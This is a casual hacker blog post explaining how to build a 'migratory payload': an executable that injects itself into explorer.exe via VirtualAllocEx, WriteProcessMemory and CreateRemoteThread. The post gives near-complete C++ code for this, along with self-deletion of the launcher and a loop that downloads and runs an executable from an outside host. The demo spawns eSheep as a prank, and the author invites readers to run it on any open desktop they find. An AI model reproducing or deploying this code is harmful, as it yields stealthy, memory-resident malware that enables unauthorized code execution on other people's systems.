Hi. I’m procrastinating again, but this time it’s related to the project I’m procrastinating on. And according to a well-respected hacker, this is a functional way to be productive. So you, the reader, benefit from everything. Besides, the deadline for the Phrack CFP isn’t for another few months, so I’ve got time. (Famous last words.)

First of all, what the hell do I mean by migratory payload? That’s not a term in MITRE ATT&CK! In more technical terms, when I say “migratory payload,” I am referring to an executable that, after starting up and running as its own process, can move itself into the memory space of another executable and carry on from there. Think of an executable that runs away from your mouse and injects itself into explorer.exe after you double-click it. It ultimately relies on process injection, which is similar to, but slightly different from, DLL injection. MITRE can be fun to rag on, but they host a useful technical compendium.

So why did I make up the term “migratory payload,” and what does it do? It sounds neat and it does what it says on the tin: it migrates from executable to executable via whatever method of memory injection is deemed necessary. Here’s an executive summary of what a migratory payload would do:

  • Start (as you do)
  • Allocate memory in another process
  • Write executable to allocated memory
  • Spawn thread that loads and runs the executable image in the target process
  • Delete original process
  • Party in the target executable

But is this just a party trick? Kind of, but it’s useful: once you’re in the memory of a trusted process like explorer.exe, it can be difficult to extract you without knowing that explorer.exe is infected. Interestingly, there’s honestly not a lot to writing a migratory payload. There are just a lot of moving pieces to be aware of to write the program effectively.

Let’s talk about how to write an effective payload of this variety!

Don’t Sweat the Techniques

I have practically spammed this article I wrote talking about how to load a PE file manually. You’re gonna wanna read it again if you’re not familiar with the process already– we need it to load our PE file once it’s injected into the target process. Depending on which process we’re migrating to, we might want a different function to call to load our binary. Despite being remote to the target process, we don’t need to rely on __declspec(dllexport) entries to call target functions! We can simply calculate the RVA of the function we wish to call to get the address of the function as it exists in the remote process and call CreateRemoteThread.
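
To make the RVA arithmetic concrete, here is a minimal sketch. The helper names va_to_rva and rva_to_va are made up for illustration and are not taken from the payload’s source; the point is only that an offset measured against one base can be replayed against another.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical helpers (names are illustrative). An RVA is simply the distance
// of an address from the base of the image that contains it.
inline std::uint32_t va_to_rva(std::uintptr_t image_base, std::uintptr_t address) {
   assert(address >= image_base);
   return static_cast<std::uint32_t>(address - image_base);
}

// Applying the same RVA to a different base yields the matching address in
// another copy of the same image.
inline std::uintptr_t rva_to_va(std::uintptr_t image_base, std::uint32_t rva) {
   return image_base + rva;
}
```

If a function sits at 0x00401230 in an image based at 0x00400000, its RVA is 0x1230, and in a copy of the image based at 0x10000000 the same function would be found at 0x10001230.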

If you’re familiar with how modern programs in MSVC compile down to code, you know about the C runtime. If you’re not familiar, the C and C++ runtimes are the boilerplate code included in your program that sets up the environment before your own entrypoint gets called. It is what drives the difference between main and WinMain. It’s the reason for the separate /MD and /MT compiler switches. Because /MD makes the resulting binary depend on version-specific MSVC runtime DLLs, and /MT statically links the runtime, which still has to be initialized prior to the call to main regardless of whether it’s a DLL or EXE entrypoint, we need to be aware of this when initializing our binary in another process. You might be tempted to say fuck it and issue the /NODEFAULTLIB linker switch for maximum flexibility, which ultimately wipes out the C runtime preamble, but unless you’re prepared for the painful hell that is lacking a C runtime, you don’t want to do that.

Let’s talk about entrypoints for a second. Depending on whether your binary is configured to be a DLL or an EXE, you get wildly different entrypoints. For DLLs, you have the following entrypoint:

BOOL WINAPI DllMain(HINSTANCE dll_instance, DWORD reason, LPVOID reserved)

This is not just the C runtime entrypoint either: when a file is loaded by the Windows loader as a DLL, the function at AddressOfEntryPoint has that signature. For executables, though, the entrypoint isn’t like the C runtime entrypoint for main at all. The executable entrypoint, we’ll call it start, is very simple:

int start(void)

This is from the deep lore that is the Windows loader.

Because a DLL by design separates functions (exports) from loaders (DllMain), it is clearly the superior configuration for this sort of setup, due to needing to deal with the C runtime preamble in some way or another. This is why DLL injection reigns supreme– it is an easily shimmable piece of code which has clearly delineated functionality versus loading. But DLLs are hard to deploy functionally without some sort of corresponding executable piece. A DLL needs a trigger after all. So let’s make an executable with a multipurpose main routine!

The main routine for the C runtime comes with a quirk: when you return from main, ExitProcess is eventually called. This is problematic if we’re going to invade the space of a permanently-running executable like explorer.exe with CreateRemoteThread! We can create an atexit routine that, instead of calling ExitProcess, calls ExitThread (documentation here). And since we have control over the allocated memory of the module when it migrates to another executable’s space, we can use arbitrary thread functions to instrument the pre-load state of the binary as it migrates.

The superiority of the DLL approach also rears its ugly head here: we need a fresh image to inject into our target program! Interestingly, however, it’s also its Achilles’ heel. What makes the DLL superior is that it can rapidly launch from disk into a target process with easily supported mechanisms like LoadLibraryA coupled with CreateRemoteThread. See, the DLL is being converted from a disk image to a memory image, and it achieves this by existing on disk to begin with. What if, once we’ve stopped existing on disk and have infested one process, we wanted to infest another? Well, we would need to preserve the image in its pre-load state, which is typically its disk image state. Since the goal here is to exist outside the system’s disk as much as possible, we can be rather fluid as to what we want the prior state to be, but we’ll be lazy and just stick with the disk image as a base state for now.

That’s a lot of fucking words without a break and I’m sorry, but I’m trying to set the scene here. Let’s break down what we need as a base state for the migratory payload:

  • a main routine with some sort of multi-entrant state (since we’re calling it for the C runtime)
  • the migration fork in the main routine which sets ExitThread atexit hooks
  • a loader thread which loads the image and sets the target state
  • a fresh copy of the memory image prior to the calling of the entrypoint for fresh migration
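
As a rough illustration of the first two bullets, a multi-entrant main can be modeled as a dispatch on a state that only a loader ever sets. Everything here is a hypothetical stand-in (PayloadState, PayloadConfig, ACTIVE_CONFIG and the two run_ functions are invented for the sketch), and it deliberately leaves out the exit hook and anything Windows-specific.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical names throughout; a real config would carry more fields.
enum class PayloadState : std::uint32_t {
   STATE_LAUNCHER = 0,  // default: started normally from disk
   STATE_MIGRATED = 1,  // set by the loader after moving to a new host
};

struct PayloadConfig {
   PayloadState state;
};

// Null until a loader installs a config, so a normal launch takes the default path.
PayloadConfig *ACTIVE_CONFIG = nullptr;

int run_launcher() { return 1; }  // stand-in for the "find a target and migrate" branch
int run_migrated() { return 2; }  // stand-in for the "install exit hook, do the work" branch

// Multi-entrant main body: the same routine serves every stage of the payload.
int payload_main() {
   PayloadState state = (ACTIVE_CONFIG == nullptr)
      ? PayloadState::STATE_LAUNCHER
      : ACTIVE_CONFIG->state;

   switch (state) {
   case PayloadState::STATE_MIGRATED:
      return run_migrated();
   case PayloadState::STATE_LAUNCHER:
   default:
      return run_launcher();
   }
}
```

The design choice worth noting is that the default path needs no configuration at all, so the binary behaves like an ordinary program until something explicitly flips its state.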

That’s enough theory, let’s let the rubber hit the pavement and get an implementation going.

Applying the Techniques

First of all, fuck main for this purpose. main in the C runtime triggers spawning a console window. Do you really want to spawn a new console window with every infection? “Maybe I want to debug it,” you might be thinking. Sure, if that’s your style of debugging, I’m not going to knock it. I’m not going to throw stones– printf debugging is an age-old technique and I’m guilty of it sometimes too. No, we want good old WinMain for this, documentation here.

int WINAPI WinMain(HINSTANCE instance, HINSTANCE prev_instance, LPSTR command_line, int show_command)

Secondly, we want a fresh image for migration purposes! How do we get that? Our executable is at its freshest just before the first entrypoint, which is not WinMain but a TLS callback. So we create a TLS callback which parses our executable’s PE header to get the size of the image and copies a fresh image for later manipulation.

VOID WINAPI get_fresh_image(PVOID instance, DWORD reason, PVOID reserved) {
   /* only take the snapshot once, when the process first attaches */
   if (reason != DLL_PROCESS_ATTACH)
      return;

   std::uint8_t *self_u8 = (std::uint8_t *)instance;
   PIMAGE_NT_HEADERS64 nt_headers = get_nt_headers(self_u8);
   FRESH_IMAGE = (std::uint8_t *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nt_headers->OptionalHeader.SizeOfImage);

   /* leave FRESH_IMAGE null if the allocation failed */
   if (FRESH_IMAGE == nullptr)
      return;

   std::memcpy(FRESH_IMAGE, self_u8, nt_headers->OptionalHeader.SizeOfImage);
}

#pragma comment(linker, "/INCLUDE:_tls_used")
#pragma comment(linker, "/INCLUDE:tls_callback")
#pragma const_seg(push)
#pragma const_seg(".CRT$XLAAA")
extern "C" const PIMAGE_TLS_CALLBACK tls_callback = get_fresh_image;
#pragma const_seg(pop)

We specifically call HeapAlloc and not std::malloc because std::malloc requires the C runtime to be initialized, which happens in the runtime’s startup code just before the main entrypoint is called, and our TLS callback is specifically intended to run before that. If you really wanted to, you could call VirtualAlloc, but since the image is going to be externally executed in a remote buffer it seems a little overkill.

Because we might want our loader to rely on data and code relocated by the relocation directory, we separate relocating the binary from the loader, and perform the relocation on the binary before it’s written to the process space of the target binary we want to migrate to.
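
The reasoning is easier to see with a deliberately simplified model. Real images describe their fixups in the base relocation directory, which this sketch does not parse; here the fixup offsets are simply handed in as a list, and rebase_pointers is a hypothetical name, not the relocation routine used in the payload.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Simplified model: `fixups` lists byte offsets of 64-bit absolute addresses
// stored inside `image`. Each one is shifted by the distance between the base
// the image was prepared for and the base it will actually live at.
void rebase_pointers(std::vector<std::uint8_t> &image,
                     const std::vector<std::size_t> &fixups,
                     std::uint64_t old_base,
                     std::uint64_t new_base) {
   // unsigned arithmetic wraps, so this also works when new_base < old_base
   const std::uint64_t delta = new_base - old_base;

   for (std::size_t offset : fixups) {
      assert(offset + sizeof(std::uint64_t) <= image.size());

      std::uint64_t value;
      std::memcpy(&value, image.data() + offset, sizeof(value));  // avoids unaligned access
      value += delta;
      std::memcpy(image.data() + offset, &value, sizeof(value));
   }
}
```

Because the adjustment only needs the two base addresses, it can be done on a local copy before the bytes are ever written anywhere else, which is exactly why the relocation step can be separated from the loader.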

You might also be painfully aware of another bottleneck: a single argument being passed to our loader and other target functions, since we’re relying on CreateRemoteThread. The worst part is that we can’t successfully pass anything that relies on pointers via CreateRemoteThread– we would need to deep copy and transfer the data we need via VirtualAllocEx and WriteProcessMemory to the target process, then pass that pointer to CreateRemoteThread as the thread’s argument. Clunky, but it works.
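
One way to sidestep the pointer problem is to keep the configuration flat: fixed-size fields and inline buffers only, so the raw bytes mean the same thing in any address space. The sketch below is an assumption about how such a struct could look (FlatConfig and make_flat_config are invented names, and the 260 mirrors MAX_PATH); it is portable C++ and only simulates the transfer with a byte copy.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <type_traits>

// Hypothetical config: no pointers, so it survives being copied byte for byte.
struct FlatConfig {
   std::uint32_t launcher_pid;
   std::uint32_t max_items;
   char launcher_file[260];  // inline buffer instead of a char* or std::string
};

static_assert(std::is_trivially_copyable<FlatConfig>::value,
              "FlatConfig must be safe to copy as raw bytes");

// Deep-copies a heap-backed std::string into the inline buffer.
FlatConfig make_flat_config(std::uint32_t pid, std::uint32_t max_items, const std::string &path) {
   FlatConfig config;
   std::memset(&config, 0, sizeof(config));
   config.launcher_pid = pid;
   config.max_items = max_items;

   // truncate if needed and always leave room for the terminating NUL
   const std::size_t capacity = sizeof(config.launcher_file) - 1;
   const std::size_t length = path.size() < capacity ? path.size() : capacity;
   std::memcpy(config.launcher_file, path.data(), length);
   return config;
}
```

A std::string member would have broken this, since its bytes hold a pointer into the sender’s heap; the static_assert is there to catch that kind of mistake at compile time.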

Spamming you with this how-to again, because now’s the time in the article where we talk about writing the loader. On top of needing to prepare the image for execution as if we’re calling LoadLibrary, we need to alter the new main state of the migrated binary so that our WinMain routine changes routes. Once we’ve changed the state with the loader routine, we can write our configuration data to the process and re-execute WinMain with our altered state.

Now it’s time to use the loader. We need to open our target process for manipulation and injection. Once we’ve found our target process– I have chosen to call EnumProcesses to find explorer.exe– we can attempt to acquire a process handle in the following way.

      /* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
      HANDLE explorer_proc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
      assert(explorer_proc != nullptr);

From here, we can create a copy of our fresh image and write it into our target process’s memory space.

      /* allocate space for our executable */
      std::uint8_t *self_u8 = (std::uint8_t *)GetModuleHandleA(nullptr);
      PIMAGE_NT_HEADERS64 self_nt = get_nt_headers(self_u8);
      std::uintptr_t explorer_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, self_nt->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      assert(explorer_base != 0);
      
      /* copy the executable in memory and relocate it to the allocated base */
      std::uint8_t *copy_u8 = (std::uint8_t *)std::malloc(self_nt->OptionalHeader.SizeOfImage);
      std::memcpy(copy_u8, FRESH_IMAGE, self_nt->OptionalHeader.SizeOfImage);
      relocate_image(copy_u8, (std::uintptr_t)self_u8, explorer_base);
      
      /* write the relocated executable to the process's allocation with WriteProcessMemory */
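      /* keep the call outside assert so it still runs when NDEBUG is defined */
      SIZE_T bytes_written;
      BOOL image_written = WriteProcessMemory(explorer_proc, (LPVOID)explorer_base, copy_u8, self_nt->OptionalHeader.SizeOfImage, &bytes_written);
      assert(image_written);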

We then create the configuration needed for our migrated binary, copy it into the memory of our target executable, then create a thread for our loader by calculating our loader function’s RVA and executing it with the configuration pointer.

      std::uintptr_t config_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
      assert(config_base != 0);

      SheepConfig explorer_config;
      std::memset(&explorer_config, 0, sizeof(SheepConfig));
      explorer_config.image_base = explorer_base;
      explorer_config.state = MonitorState::STATE_MONITOR;
      explorer_config.launcher_pid = GetCurrentProcessId();
      explorer_config.max_sheep = 10;
      GetModuleFileName(nullptr, &explorer_config.launcher_file[0], MAX_PATH);

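      /* keep the call outside assert so it still runs when NDEBUG is defined */
      BOOL config_written = WriteProcessMemory(explorer_proc, (LPVOID)config_base, &explorer_config, sizeof(SheepConfig), &bytes_written);
      assert(config_written);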
      
      /* get the rva of the loader and call it with CreateRemoteThread */
      DWORD loader_rva = VA_TO_RVA(self_u8, load_image);
      DWORD loader_id;
      HANDLE loader_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+loader_rva), (LPVOID)config_base, 0, &loader_id);
      assert(loader_handle != nullptr);
      
      /* wait for the thread to finish */
      WaitForSingleObject(loader_handle, INFINITE);

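Finally, all that’s left to do is re-execute WinMain in the target process. We do that by starting a thread at the image’s AddressOfEntryPoint, so the C runtime startup code runs first and then calls WinMain for us.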

      /* get the rva of the target routine and call it with CreateRemoteThread */
      DWORD main_id;
      HANDLE main_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+self_nt->OptionalHeader.AddressOfEntryPoint), nullptr, 0, &main_id);
      assert(main_handle != nullptr);

Demo Payload: Sheep Monitor

Let’s talk about the demo payload for a moment. I am a particular fan of the classic eSheep program, and if you’ve been paying attention you’ve noticed me using it a lot in the preceding blog posts. This demo payload is no different. One of the things I wanted this demo payload to do was demonstrate being aggressively memory-resident and recreate the classic “delete yourself” technique. So in the opening routine of our payload, we have the following code.

    case MonitorState::STATE_MONITOR: {
      atexit(exit_thread);

      DWORD exit_code = STILL_ACTIVE;
      
      do {
         HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, GLOBAL_CONFIG->launcher_pid);

         // if it results in a null handle, the process is probably dead
         if (proc == nullptr)
            break;

         GetExitCodeProcess(proc, &exit_code);
         CloseHandle(proc); // release the handle each pass so the loop doesn't leak one per second
         Sleep(1000);
      } while (exit_code == STILL_ACTIVE);

Here, we open the original launcher process by its ID and poll it until it stops running. Then, we keep trying to delete the launcher file from disk, retrying once a second until the delete succeeds or the file is already gone, before continuing.

      /* we could get fancy and persist in the registry if we so wanted to right here,
       * but for demo purposes we simply delete the original file */
      while (!DeleteFile(GLOBAL_CONFIG->launcher_file)) {
         DWORD error = GetLastError();

         if (error == ERROR_FILE_NOT_FOUND)
            break;
         
         Sleep(1000);
      }

We are now ready to enter our main process loop. Functionally, it’s pretty simple.

  • Create a pool of processes
  • If the sheep program isn’t present, download it
  • If the pool isn’t at the limit, spawn a new sheep while clearing inactive sheep
  • If the pool is full, every sheep plays Russian Roulette to thin out the herd
  • Sleep for 60 seconds and do it all again

      std::vector<PROCESS_INFORMATION> sheep_pool;

      while (GetFileAttributes("C:\\ProgramData\\sheep.exe") != INVALID_FILE_ATTRIBUTES || download_url(L"amethyst.systems", L"/sheep.exe", "C:\\ProgramData\\sheep.exe")) {
         if (sheep_pool.size() > 0)
            while (clear_inactive_sheep(sheep_pool));

         if (sheep_pool.size() < GLOBAL_CONFIG->max_sheep) {
            PROCESS_INFORMATION new_sheep;
            
            if (spawn_sheep(&new_sheep))
               sheep_pool.push_back(new_sheep);
         }
         else
            russian_roulette(sheep_pool);

         Sleep(60000);
      }
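
The two pool helpers aren’t shown here, so the following is only a guess at their shape, written against a stand-in Sheep struct instead of PROCESS_INFORMATION so it stays portable. The names clear_one_inactive and thin_herd, and the one-in-six odds, are assumptions made for the sketch.

```cpp
#include <cassert>
#include <cstddef>
#include <random>
#include <vector>

// Hypothetical stand-in for a tracked process: just an id and a liveness flag.
struct Sheep {
   int id;
   bool alive;
};

// Removes at most one dead entry per call and reports whether it removed one,
// which is the shape a `while (clear(...));` loop expects.
bool clear_one_inactive(std::vector<Sheep> &pool) {
   for (std::size_t i = 0; i < pool.size(); ++i) {
      if (!pool[i].alive) {
         pool.erase(pool.begin() + static_cast<std::ptrdiff_t>(i));
         return true;
      }
   }
   return false;
}

// Each living entry has a one-in-`chambers` chance of being marked dead.
template <typename Rng>
void thin_herd(std::vector<Sheep> &pool, Rng &rng, int chambers = 6) {
   assert(chambers > 0);
   std::uniform_int_distribution<int> spin(1, chambers);

   for (Sheep &sheep : pool) {
      if (sheep.alive && spin(rng) == 1)
         sheep.alive = false;  // a real version would act on the process here
   }
}
```

Marking entries dead and sweeping them on the next pass keeps the two jobs separate, which matches the order of the loop above: clear first, then either spawn or thin.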

This payload could be considered functional prankware. Feel free to run it on any open desktop you find! It’s memory-resident and disappears either when explorer.exe crashes (though not as a result of us) or when the user reboots.

Merry Christmas and happy hacking!